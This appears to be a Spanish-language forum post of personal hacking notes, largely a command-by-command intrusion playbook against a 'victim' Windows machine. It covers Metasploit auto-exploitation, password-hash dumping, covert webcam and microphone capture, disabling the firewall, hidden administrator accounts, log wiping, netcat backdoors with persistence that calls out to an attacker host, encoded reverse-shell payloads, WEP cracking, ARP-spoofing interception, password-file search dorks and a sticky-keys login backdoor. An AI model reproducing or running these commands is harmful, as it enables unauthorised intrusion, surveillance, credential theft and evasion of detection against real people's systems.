Título: Anotaciones Publicado por: AngelFire en 22 Julio 2012, 23:37 pm Bueno a todos los de este excelente sitio me gustaria compartir con ustedes partes de las anotaciones que ha generado horas de tutorial, video tutoriales, foros etc.
Espero le sea de su agrado, 100% modificable libre, la pueden mejorar, debatir con los demas en fin como todos los demas no me hago resposanble de mal uso de la informacion. Asi que confio en que la sepan usar bien ;D. Cualquier coincidencia con los ip es pura coincidecia siempre me ha dado trabajo algunos man de linux los cuales a veces no viene con muchos ejemplos, lo cual retrasa el uso de los comandos pero aun asi siguien siendo lo maximo. En fin good luck. ******************************************************************************* ******************************************************************************* Perfeccionamiento de la técnica de hackeo. Cerciorarse que no tiene KAV. msf > db_nmap 10.10.0.4 -p 1110 -------------------------------------------------------------------------------
Conociendo a nuestra víctima. msf > db_nmap -T5 -A -v 10.10.0.4 ------------------------------------------------------------------------------- Nmap: Discovered open port 445/tcp on 10.10.0.4
Lanzar todos los exploit conocidos a los puertos abiertos con conexión reversa. La víctima se conecta a nosotros no nosotros a la víctima msf > db_autopwn -t -e -r -p Interactuando con la session 1 creada en la víctima. msf > sessions -i 1 Saber que está haciendo nuestra víctima. msf > screenshot Conocer que Procesos está corriendo. msf > ps Detectar si tiene webcam. msf > webcam_list Tirarle una foto a la víctima si tiene webcam. msf > webcam_snap 1 Grabar audio del micrófono la víctima. msf > record_mic Descargando los hash de los usuarios de la máquina. msf > hashdump -------------------------------------------------------------------------------------- Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: -------------------------------------------------------------------------------------- Pasar a CMD. msf > execute -f cmd.exe -i -c -H Ocultar de la pantalla de inicio el usuario que vamos a crear. c:\windows\system32> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000 Parar Centro de Seguridad. c:\windows\system32> sc stop wscsvc Deshabilitar Centro de Seguridad. c:\windows\system32> sc config wscsvc start= disabled Parar Firewall de Windows. c:\windows\system32> sc stop sharedaccess Deshabilitar Firewall de Windows. c:\windows\system32> sc config sharedaccess start= disabled Habilitar Telnet. c:\windows\system32> sc config tlntsvr start= auto Iniciar Telnet. c:\windows\system32> sc start tlntsvr Conociendo detalles de la víctima. c:\windows\system32> systeminfo ------------------------------------------------------------------------------- Nombre de host: JACK-PC Nombre del sistema operativo: Microsoft Windows XP Professional Versión del sistema operativo: 5.1.2600 Service Pack 3 Compilaci?n 2600 Fabricante del sistema operativo: Microsoft Corporation Configuración del sistema operativo: Estación de trabajo independiente Tipo de compilación del sistema operativo: Uniprocessor Free Propiedad de: Jack Organización registrada: Home Id. del producto: 55274-640-8365391-23962 Fecha de instalación original: 18/07/2011, 23:02:38 Tiempo de actividad del sistema: 0 días, 0 horas, 49 minutos, 35 segundos Fabricante del sistema: innotek GmbH Modelo el sistema: VirtualBox Tipo de sistema: X86-based PC Procesador(es): 1 Procesadores instalados. [01]: x86 Family 6 Model 15 Stepping 13 GenuineIntel ~438 Mhz Versión del BIOS: VBOX - 1 Directorio de Windows: C:\WINDOWS Directorio de sistema: C:\WINDOWS\system32 Dispositivo de inicio: \Device\HarddiskVolume1 Configuración regional del sistema: 0c0a Idioma: 0000040A Zona horaria: N/D Cantidad total de memoria física: 255 MB Memoria física disponible: 150 MB Memoria virtual: tamaño máximo: 2.048 MB Memoria virtual: disponible: 2.008 MB Memoria virtual: en uso: 40 MB Ubicación(es) de archivo de paginación: C:\pagefile.sys Dominio: GRUPO_TRABAJO Servidor de inicio de sesión: N/D Revisión(es): 1 revisión(es) instaladas. [01]: Q147222 Tarjeta(s) de red: 1 Tarjetas de interfaz de red instaladas. [01]: Adaptador Ethernet PCI AMD PCNET Family Nombre de conexión: Conexión de Área local DHCP habilitado: No Direcciones IP [01]: 10.10.0.4 ------------------------------------------------------------------------------- Conociendo su configuración IP para ver si usa puerta de enlace. c:\windows\system32> ipconfig ------------------------------------------------------------------------------- Configuración IP de Windows Adaptador Ethernet Conexión de ?rea local : Sufijo de conexión específica DNS : Dirección IP. . . . . . . . . . . : 10.10.0.4 Máscara de subred . . . . . . . . : 255.255.255.0 Puerta de enlace predeterminada : 10.10.0.1 ------------------------------------------------------------------------------- Conocer si usa proxy. HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting ------------------------------------------------------------------------------- ProxyServer 192.168.0.1:8080 ------------------------------------------------------------------------------- Conocer recursos compartidos. c:\windows\system32> net share ------------------------------------------------------------------------------- Nombre Recurso Descripción ------------------------------------------------------------------------------- ADMIN$ C:\WINDOWS Admin remota C$ C:\ Recurso predeterminado IPC$ IPC remota Se ha completado el comando correctamente. ------------------------------------------------------------------------------ Crear usuario. c:\windows\system32> net user loko loko /add Agregarlo al grupo de administradores. c:\windows\system32> net localgroup administradores loko /add Montando recursos compartidos en nuestro explorer. Nota: Ojo este comando es en el CMD de nuestra PC no en Mestaploit. Win+R cmd C:\Users\REDES> net use z: \\10.10.0.4\c$ ----------------------------------------------------------------------------- Escriba el nombre de usuario para "10.10.0.4": loko Escriba la contraseña para 10.10.0.4: loko Se ha completado el comando correctamente. ----------------------------------------------------------------------------- Win+E Una vez terminado podemos hacer click derecho desconectar o volver a CMD de nuestra PC no en Mestaploit . C:\Users\REDES> net use z: /delete Volvemos a Metasploit. Saliendo de CMD. c:\windows\system32> exit Limpiar eventos de windows. msf > clearev Saliendo de meterpreter. msf > kill Cualquier contratiempo siga leyendo los Anexos y perfeccione su ataque. ******************************************************************************* ******************************************************************************* Esto puede evitar algunos problemas. Los espacios equivalen a %20 y %2B equivale a un "+" ******************************************************************************* ******************************************************************************* En Debian los comandos ettercap y john funcionan bajo sudo. $sudo ettercap -C $sudo john ******************************************************************************* ******************************************************************************* Conocer procesos remotos: C:\>tasklist /S 10.1.8.123 /u redes /p qwerty12345 Parar procesos remotos: C:\>taskkill /S 10.1.8.123 /u redes /p qwerty12345 /PID 196 ******************************************************************************* ******************************************************************************* Hydra se usa para crackear SMB. $./hydra -L users.txt -P passwords.txt example.com ftp ******************************************************************************* ******************************************************************************* Sniffer de metasploit captura hash de conexiones hacia la PC atacante. msf >use smb_sniffer msf smb_sniffer > set PWFILE=/tmp/pwtest.txt ******************************************************************************* ******************************************************************************* Generar Worldlist con John the Ripper. 2 Caracteres todas las combinaciones posibles. $john -stdout=2 -incremental > /home/intrude/Worldlist.txt ó $john -stdout=2 -i > /home/intrude/Worldlist.txt 2 Caracteres todas las letras minúsculas. $john -stdout=2 -i=alpha > /home/intrude/Worldlist.txt 2 Caracteres todos los números. $john -stdout=2 -i=digits > /home/intrude/Worldlist.txt 2 Caracteres todas las letras minúsculas y los números. $john -stdout=2 -i=alnum > /home/intrude/Worldlist.txt Ojo: Todo los password ya crackeados en la pc se acumulan en john.pot . ******************************************************************************* ******************************************************************************* Hacer una lista de caracteres personalizada para generar Worldlist.txt con John the Ripper. Se debe crackear un hash primero por ejemplo. /home/intrude/.john/hash.txt ----------------------------------------------------------------------------- Administrador:500:b757bf5c0d87772faad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6::: ----------------------------------------------------------------------------- $sudo john hash.txt Una vez hallado el password 1234 vamos a $cd /usr/share/john Para tener todos los *.chr juntos. Luego hacemos un custom.chr que contenga solo 1234. $sudo john --make-charset=custom.chr /home/intrude/.john/hash.txt Editamos la connfiguracion de john para poder hacer un incremento de nuestro custom.chr $sudo gedit /etc/john/john.cfg ----------------------------------------------------------------------------- [Incremental:Custom] File = /usr/share/john/custom.chr MinLen = 1 MaxLen = 8 CharCount = 4 #Caracteres adicionales y consideremos que ya tenemos 1234 en el custom.chr. #Deberiamos hacer un hash con lo que consideremos que siempres estara. #Porque al poner 1234 ya sabes que va estar en las combinaciones. #Ahora que ya sabemos pienso que es mejor hacer un hash con " ". Extra = abcdefghiklm ----------------------------------------------------------------------------- Finalmente procedemos. $john -stdout=2 -i=custom > /home/intrude/Worldlist.txt Donde se nos creara un Worldlist.txt que contendrá un Len = 2 con todas las combinaciones posibles con los custom 1 2 3 4 más los caracteres declarado en Extra = ******************************************************************************* ******************************************************************************* How to set static IP in Backtrack4 $nano /etc/network/interfaces ----------------------------------------------------------------------------- auto lo iface lo inet loopback #Red cableada auto eth0 iface eth0 inet static address 192.168.0.100 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 #Red inalámbrica auto wlan0 iface wlan0 inet static address 168.254.0.0 netmask 255.254.0.0 #Red virtualbox auto vboxnet0 iface vboxnet0 inet static address 168.254.0.0 netmask 255.254.0.0 ----------------------------------------------------------------------------- Si existe servidor dns: $nano /etc/resolv.conf ----------------------------------------------------------------------------- nameserver 192.168.0.1 ----------------------------------------------------------------------------- $/etc/init.d/networking start o $ifup eth0 ó $ifconfig eth0 up Si se hace cualquier cambio: $/etc/init.d/networking restart Para parar: $/etc/init.d/networking stop ó $ifdown eth0 ó $ifconfig eth0 down ******************************************************************************* ******************************************************************************* Configurar Wifi en modo grafico. $/etc/init.d/wicd start ó $start-network ******************************************************************************* ******************************************************************************* Muestra los dispositivos inalámbricos disponibles para realizar el airmon-ng. $airmon-ng wlan0 Atheros ath5k - [phy0] ******************************************************************************* ******************************************************************************* Iniciar la wlan o pararla $ifconfig wlan0 up $ifconfig wlan0 down ******************************************************************************* ******************************************************************************* Determinar puerto abiertos de una pc remotamente. $nmap -vv 192.168.0.2 PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1110/tcp open nfsd-status 3389/tcp open ms-term-serv 6002/tcp open X11:2 19780/tcp open unknown MAC Address: 00:18:F3:71:6C:68 (Asustek Computer) ******************************************************************************* ******************************************************************************* Ettercap $nano /etc/etter.conf #--------------- # Linux #--------------- # if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" ******************************************************************************* ******************************************************************************* Setting your IP manually root@bt:~# ifconfig eth0 192.168.1.112/24 root@bt:~# route add default gw 192.168.1.1 root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf ******************************************************************************* ******************************************************************************* Wifi WEP $startx $/etc/init.d/networking start $airmon-ng $airmon-ng stop (interface) $ifconfig (interface) down Cambiar la mac de la wlan0 ("FakeMac") valido si quisiera hacerse para eth0 en fin cualquier interface. $macchanger --mac 00:11:22:33:44:55 (interface) $airmon-ng start (interface) $airodump-ng (interface) ctrl + c $airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) $aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) ctrl + c $airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] $aireplay-ng -1 0 -a [bssid] [wireless card name] $aireplay-ng -3 b [bssid][wireless card name] ctrl + c dir $aircrack-ng [filename] ******************************************************************************* ******************************************************************************* Buscar un fichero. $find -name '*.rmvb' ******************************************************************************* ******************************************************************************* Nmap. $namp -sS -P0 -F -O -d -vv -T3 KAV $nmap 192.168.0.2 KAV $nmap -vv 192.168.0.2 -p 135 NoKAV $nmap -vv 192.168.0.2 -p 135,445 NoKAV $nmap -vv 192.168.0.2 -p 0-65535 KAV Salvar los resultados de salidas de forma complensible. $nmap -sF 10.10.10.1/24 -oN outfile Mantener ocupado los NDIS $nmap -sS 10.10.10.1 -D 192.168.0.1 Comando Nmap en aplicaciones de BackTrack4. Intense Scan msf > db_nmap -T5 -A -v 192.168.0.2 KAV Quick Scan msf > db_nmap -T5 -F 192.168.0.2 NoKAV Quick Scan (OS Detect) msf > db_nmap -sV -T5 -O -F --version-light 192.168.0.2 NoKAV ******************************************************************************* ******************************************************************************* Normal Open Ports in Windows XP Sp2 Professional PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1110/tcp open nfsd-status KAV 3389/tcp open ms-term-serv ******************************************************************************* ******************************************************************************* Crack rar zip 7z root@bt:/pentest/passwords/rarcrack# ./rarcrack /media/ALAIN\ V/Password/Foto s.zip --threads 12 --type zip ******************************************************************************* ******************************************************************************* Obtener el SAM localmente con BT4. $samdump2 /media/disk/WINDOWS/system32/config/system /media/disk/WINDOWS/system32/config/SAM >hash.txt Cracking SAM con John the ripper. $./john --format:NT hash.txt ******************************************************************************* ******************************************************************************* Compilar c files. $gcc -o mssmb_poc mssmb_poc.c Ejecutar $./mssmb_poc ******************************************************************************* ******************************************************************************* Compilar c files con LCC32. C:\lcc\bin>bin mssmb_poc.c C:\lcc\bin>lcclnk mssmb_poc.obj C:\lcc\bin>mssmb_poc ******************************************************************************* ******************************************************************************* Habilitar Microsoft Terminal Server. Default Port: 3389. C:\>reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "0" ******************************************************************************* ******************************************************************************* Lista de últimos videos vistos en Media Player Classic. HKEY_CURRENT_USER\Software\Gabest\Media Player Classic\Recent File List ******************************************************************************* ******************************************************************************* Lista de últimos documentos vistos en Microsoft Word HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU ******************************************************************************* ******************************************************************************* Lista de máquinas a la cuales se le ha hecho Telnet. HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default ******************************************************************************* ******************************************************************************* Transferir ficheros por tftp. Default Port:69. PC del Atacante. Abrir tftpd32.exe Declarar Current Directory "C:\Temp" Declarar Server Interface 10.10.0.1 (Ip del atacante) PC Víctima. PUT sube al Atacante notepad.exe a C:\Temp en el atacante. C:\>tftp -i 10.10.0.1 PUT C:\Windows\notepad.exe GET descarga del Atacante nc.exe el cual debe estar en C:\Temp ya que es nuestro Current Directory. C:\>tftp -i 10.10.0.1 GET nc.exe ******************************************************************************* ******************************************************************************* Copiar ficheros con nc. En la víctima: C:\>nc -v -l -p 1234 < C:\windows\notepad.exe En el atacante: C:\>nc -v 10.10.0.4 1234 > notepad.exe Crear un proxy con nc. Crear un proxy: Tan sencillo como : nc -l -p 2000 -c “nc host1 22” C:\>nc -l -p 2000 -c “nc example.org 22” C:\>ncat -v -l 1111 -c "ncat -l 2222" Forward Proxy. C:\>nc -w \ 20 192.168.1.10 80 Escanear con nc. C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21 DNS fwd/rev mismatch: localhost != darkstar Sniffer con nc. C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23 DNS fwd/rev mismatch: localhost != darkstar listening on [any] 23 ... DNS fwd/rev mismatch: localhost != darkstar connect to [127.0.0.1] from localhost [127.0.0.1] 1131 login: sniffado password: jeje!! Redirect a connection. C:\>nc -l -p 1234 localhost 19080 C:\>nc -l -p 80 | nc localhost 3128 Redirect a connection. C:\>nc -l -p 12345 | nc www.google.com 80 ******************************************************************************* ******************************************************************************* Pasar un servicio deshabilitado a habilitado (Telnet). C:\>sc config tlntsvr start= auto Restaurarlo. C:\>sc config tlntsvr start= disabled Iniciar un servicio. C:\>sc start tlntsvr ******************************************************************************* ******************************************************************************* Crear un servicio nuevo. C:\>sc \\victima create svchost binPath= C:\WINDOWS\system\serviciosecreto.exe C:\>sc \\victima start svchost Otro. C:\>sc \\victima create backdoor binpath= "cmd /C C:\nc.exe -dLp 6666 -e cmd.exe" type= own type= interact C:\>sc \\victima start backdoor C:\>sc create Network Connections Service binPath= “cmd /K start C:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore C:\>sc create "Proxy" DisplayName= "MySQL Proxy" start= "auto" » binPath= C:\>sc config NewService binpath= "ntsd -d C:\windows\system32\NewServ.exe" Localmente. C:\>sc create spooler binPath= "C:\WINDOWS\system32\spoolsv.exe" Hacer que levante desde registro aunque se puede hacer desde el propio sc y es más under: C:\>reg add \\victima\HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\ /v Path / t REG_SZ /d C:\WINDOWS\system\serviciosecreto.exe ******************************************************************************* ******************************************************************************* Conociendo hash de la Víctima -------------------------------------------------------------------------------------- Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: -------------------------------------------------------------------------------------- Podemos usar PSExec de la siguiente forma: msf > use windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/bind_tcp msf exploit(psexec) > set RHOST 192.168.57.131 msf exploit(psexec) > set SMBUser administrador msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c ******************************************************************************* ******************************************************************************* Esto es actualmente detectado por casi cualquier antivirus, pero el conocimiento nunca está de más. Crear un payload ejecutable: $./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/7.exe Crear el mismo payload codificado con 3 enconder, 10 iteraciones el 1er encoder, 10 iteraciones el 2do encoder y 1 iteración el último encoder para un total de 21 iteración: $./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe Comprobar salida del ejecutable: $file /tmp/6.exe Conectarse al payload una vez ejecutado en la víctima: $./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E ******************************************************************************* ******************************************************************************* Meterpreter Limpiar eventos de windows. meterpreter > clearev Cargar modulo incógnito. meterpreter > use incognito Hacernos pasar por un usuario existente después de haber cargado incógnito meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM SNEAKS.IN\Administrator Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter > impersonate_token SNEAKS.IN\\Administrator Dejar servicio de Meterpreter como un BACKDOOR default port:31337 meterpreter > run metsvc Nota: Para conectarse es necesario usar exploit multi/handler y el PAYLOAD windows/metsvc_bind_tcp correctamente configurado. Ejecutar un programa por defecto estamos en C:\windows\system32\cmd.exe meterpreter > execute -f cmd.exe Obtener lista de procesos de la pc víctima. meterpreter > ps Parar un proceso en específico. meterpreter > kill PID ó meterpreter > execute -f "taskkill /f /im cmd.exe" Pasar de Meterpreter a CMD meterpreter > execute -f cmd.exe -i -c -H Crear un usuario meterpreter > execute -f "net user loko loko /add" Agregar un usuario al grupo de administradores meterpreter > execute -f "net localgroup administradores loko /add" Ocultar el usuario loko de la pantalla de bienvenida Mejor usar registro remoto. meterpreter > execute -f "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000" Toyanizar netcat después de meterpreter. meterpreter > upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK! meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe' meterpreter > reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion \Run -v CIAUZ -d "C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 1111 -e cmd.exe" Obtener un dump de SAM de la PC víctima. meterpreter > hashdump Obtener la posición. meterpreter > getwd Obtener una foto del escritorio de la víctima. meterpreter > screenshot Obtener lista de webcam disponibles en la pc de la víctima. meterpreter > webcam_list Obtener una imagen de la webcam disponible. meterpreter > webcam_snap 1 Habilitar Microsoft Terminal Server. Default Port: 3389. Con usuario "hax0r" y password "gibs0n" meterpreter > run getgui -u hax0r -p gibs0n Activar sniffer en la víctima. meterpreter > use sniffer Loading extension sniffer...success. meterpreter > help meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) meterpreter > sniffer_start 1
meterpreter > sniffer_dump 1 all.cap
meterpreter > sniffer_dump 1 all.cap
Nota: Los PCAP serán guardados en C:\Program Files\Rapid7\framework\msf3 ******************************************************************************* ******************************************************************************* Ver el volumen de una unidad. C:\>vol ******************************************************************************* ******************************************************************************* Catalogo rápido con CathyCMD. C:\>Cathycmd -f Cathy.CMD Catálogo de C C:\>dir /s >CatalogoC.txt Catálogo de disco duro con LINUX $cd /media/sda1 $ls -R > /home/intrude/Catalogo_SDA1.txt Nota: En teoría se puede hacer desde comando la pregunta es si algún editor de texto sería capaz de mostrarnos todas los directorios de un HDD de 1000 GB. Aquí es donde está la importancia del Cathy. ******************************************************************************* ******************************************************************************* Instalar telnet en windows vista y windows 7. C:\>pkgmgr /iu:"TelnetClient" C:\>pkgmgr /iu:"TelnetServer" ******************************************************************************* ******************************************************************************* Ocultar un usuario de la pantalla de bienvenida. Mejor usar registro remoto. C:\>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000 ******************************************************************************* ******************************************************************************* Evitar PING. $echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all Aceptar PING. $echo 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all ******************************************************************************* ******************************************************************************* Descargar Sitio WEB completo. $wget -r http://www.lawebquesea.com Descargar Sitios atendiendo una lista en un TXT. $wget -r -i listadewebs.txt ******************************************************************************* ******************************************************************************* Si el usuario tiene password, usa autologin aquí está su usuario y password sin cifrado. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ AltDefaultUserName loko DefaultPassword lokoloko ******************************************************************************* ******************************************************************************* Determinar proxy que usa la víctima. HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting ProxyServer 192.168.0.1:8080 ******************************************************************************* ******************************************************************************* Sniffer. Man in the middle en WIFI. $ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/ $ettercap -i wlan0 -T -q -M arp /192.168.1.1/ /192.168.1.56/ $ettercap -T -Q -M arp:remote -i wlan0 /10.10.10.23/ // -P remote_browser $ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -w dump $ettercap -i wlan0 -TqM ARP:REMOTE $ettercap -Tq -i wlan0 -M arp:remote /192.168.1.101/ /192.168.1.254/ $ettercap -i wlan0 -P remote_browser -T -q -M arp:remote /192.168.0.1/ /192.168.0.14/ $ettercap -T -q -i wlan0 -M ARP:remote /192.168.0.135/ // $ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof $tcpdump –Xx –s 500 –n $tcpdump -n host 192.168.0.2 $tcpdump -n src net 192.168.0 $tcpdump -n net 192.168.0.2 $tcpdump -nXs 0 port 110 or 25 or 20 or 21 or 23 Envenenamiento ARP sslstrip. $arpspoof -i wlan0? instead of “arpspoof -i wlan0 -t 192.168.1.xx 192.168.1.1 en otra Shell. $ettercap -T -q -i wlan0 /192.168.1.1/ /192.168.1.56/ ******************************************************************************* ******************************************************************************* Ver el Servicio Netbios que está corriendo y MAC. C:\>nbtstat -A 192.168.0.11 Mostrar todos los dispositivos de RED y sus IP STATIC. C:\>nbtstat -s ******************************************************************************* ******************************************************************************* Comando NET. Crear un usuario remotamente. C:\>net user loko loko /add Pasarlo al grupo de administradores. C:\>net localgroup administradores loko /add Cambiar contraseña. C:\>net user loko 12345 Crear usuario sin contraseña. C:\>net user loko /add Ver los recursos compartido (Local). C:\>net share Mostrar los recursos compartidos usados. C:\>net use Mostrar detalle del recurso conectado. C:\>net use \\192.168.0.2\g$ Para eliminar recursos compartidos usados. C:\>net use \\192.168.0.2\g$ /delete Conectarse a IPC$. C:\>net use \\192.168.0.2\IPC$ "loko" /user:"loko" ó C:\>net use \\192.168.0.2\IPC$ loko /user:loko Compartir una carpeta. secretaria = nombre a mostrar de la carpeta compartida. C:\cartas = ruta a compartir . C:\>net share secretaria=C:\cartas Compartir un carpeta con espacio. C:\>lista="C:\lst fig" Montar en la unidad z un recurso compartido. C:\>net use z: \\financiero\cartas Ejemplo con espacio. C:\>net use k: "\\financiero 2"\circulares Desmotar un recurso compartido de la unidad z. C:\>net use z: /delete Eliminar la carpeta compartida. C:\>net share secretaria /delete Ver lista de equipos en RED. C:\>net view Ver sesiones abiertas (Local). C:\>net session ******************************************************************************* ******************************************************************************* Ver ficheros abiertos (Local). C:\>openfiles Ver conexiones activas TCP. C:\>netstat -anp TCP Ver puertos abiertos y muy importante el PID C:\>netstat -ano El PID lo podemos ver en el taskmanager solo que hay que decirle que lo muestre. Ver todos los privilegios de un usuario. C:\>whoami ******************************************************************************* ******************************************************************************* Obtener IP, MAC y SERVICIO. C:\>arp -a ******************************************************************************* ******************************************************************************* Ver version de nuestro windows. Bien C:\>systeminfo Win+PAUSE C:\>winver ******************************************************************************* ******************************************************************************* Obtener MAC de los dispositivos de red. C:\>getmac ******************************************************************************* ******************************************************************************* Configurar permisos archivos y carpetas en modo cmd. C:\>cacls ******************************************************************************* ******************************************************************************* Ir a document and settings del usuario iniciado. %homepath% Ir a los temporales del usuario iniciado. %temp% Ir a la carpeta de instalación Windows. %windir% ******************************************************************************* ******************************************************************************* Montar partición en Linux. $mount -t <file system(ext2,vfat)> <partición (/dev/hda1,/dev/cdrom)> <punto de lecutra"mount point" (/mnt/home/ /mnt/cdrom) ******************************************************************************* ******************************************************************************* Montar particiones remotas con samba. $smbmount //IP/C$ /home/juseth -o\user=[usuario],pass=[pass],dom=[dominio] ******************************************************************************* ******************************************************************************* Búsquedas interesantes en Google. file -inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.mp3|.wma)+"Korn" -inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.doc|.rtf|.pdf)+"Korn" Password http://www.google.com/search?q=intitle%3A%22Index+of%22+passwords+modified+site%3AKorn http://www.google.com/search?hl=en&q=allinurl%3Aauth_user_file.txt+site%3AKorn http://www.google.com/search?q=inurl%3Apasslist.txt&btnG=Search+site%3AKorn http://www.google.com/search?q=%22%23+-FrontPage-%22+inurl%3Aservice.pwd+site%3AKorn http://www.google.com/search?q=intitle%3A%22Index+of%22+config.php+site%3AKorn http://www.google.com/search?q=%22http%3A%2F%2F*%3A*%40%22Korn Proxy http://www.google.com/translate?langpair=en|en&u=Korn http://www.google.com/gwt/n?u=http%3A%2F%2FKorn HEX DEC ASCII %7C 124 | %3A 58 : %28 40 ( %29 41 ) %22 34 " %2B 43 + "index of/private" + "Parent Directory" intitle:index.of .bash_history intitle:index of "Parent Directory" pass site:cu intitle:index.of .sh_history filetype:pdf site.gov.cu ******************************************************************************* ******************************************************************************* Saltando la protección DisableRegistryTools WindowsXpSp3. Este es un error súper viejo que al parecer a Windows no le importa :). Primero quitamos el permiso al registro como lo haría cualquier administrador. C:\>reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 00000001 Si todo va bien debería salir " El administrador a deshabilitado la modificación del Registro." Hacemos una copia de c:\Windows\regedit.exe porque es muy importante siempre conservar el original. Abrimos con OllyDbg nuestra copia de Regedit salvada en C:\Temp\regedit.exe Click derecho Search For> All referenced strings Veremos una dirección muy curiosa a la que haremos doble click. ------------------------------------------------------------------------------- 01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools" ------------------------------------------------------------------------------- Esto nos llevará a la sección del ejecutable donde se encuentra esta referencia. Nos fijamos en la dirección de comienzo: ------------------------------------------------------------------------------- 01009A4A .v 75 4F JNE SHORT DisableRegeditTools.01009A9B ------------------------------------------------------------------------------- La sentencia salta corto sino es igual (JNE) a la dirección 01009A9B es justo lo que necesitamos, solo que como son iguales y no se produce el salto por lo que caemos en 01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools" Ok pues entonces modificamos a 01009A4A quedando así: ------------------------------------------------------------------------------- 01009A4A .v 74 4F JE SHORT DisableRegeditTools.01009A9B ------------------------------------------------------------------------------- Como son iguales entonces se producirá el salto y obviará esta parte :) Bueno salvemos los cambios. Click Derecho Edit>Copy to Executable Resultados: Ya tenemos un regedit en C:\Temp>regedit.exe que ignora la llave DisableRegistryTools y nos permite modificar el regedit a nuestro antojo. ******************************************************************************* ******************************************************************************* Crear usuario bajo la falsificación de programas con privilegios de System en la pantalla de bienvenida de Windows Otro error que tampoco parece importarle a WindowsXpSp3 Privilegios de System en la pantalla de bienvenida de sethc.exe y utilman.exe localizados en: C:\Windows\System32> Si se logra hacer una copia de cmd.exe localizado en C:\Windows\System32> Se debería borrar sethc.exe y renombrar la copia de cmd.exe a sethc.exe Cuando se borra sethc.exe el sistema tardará poco tiempo en restablecerlo pero el tiempo que demora es más que suficiente para que nosotros renombremos nuestra copia de cmd.exe a sethc.exe. Si lo hemos hecho bien la presionar seguido 5 veces shift o simplemente turbeamos el shift nos aparecerá el cmd.exe en vez de sethc.exe. Nos vamos a la pantalla de bienvenida justo donde sale el control+alt+del presionamos estas teclas y presionamos 5 veces shift tendremos un cmd.exe con privilegios de system. Donde podremos crear un usuario con privilegios de administración. El procedimiento con utilman es similar solo que se presiona Win+U en vez de 5 veces shift. Como pueden ver una vez modificados estos ficheros es muy difícil perder la administración de un sistema al cual tengamos acceso físico. Por otra parte dudo mucho que usen mucho utilman y sethc :) así que pueden prescindir de ellos. ******************************************************************************* ******************************************************************************* Crear fichero con caracteres no validos 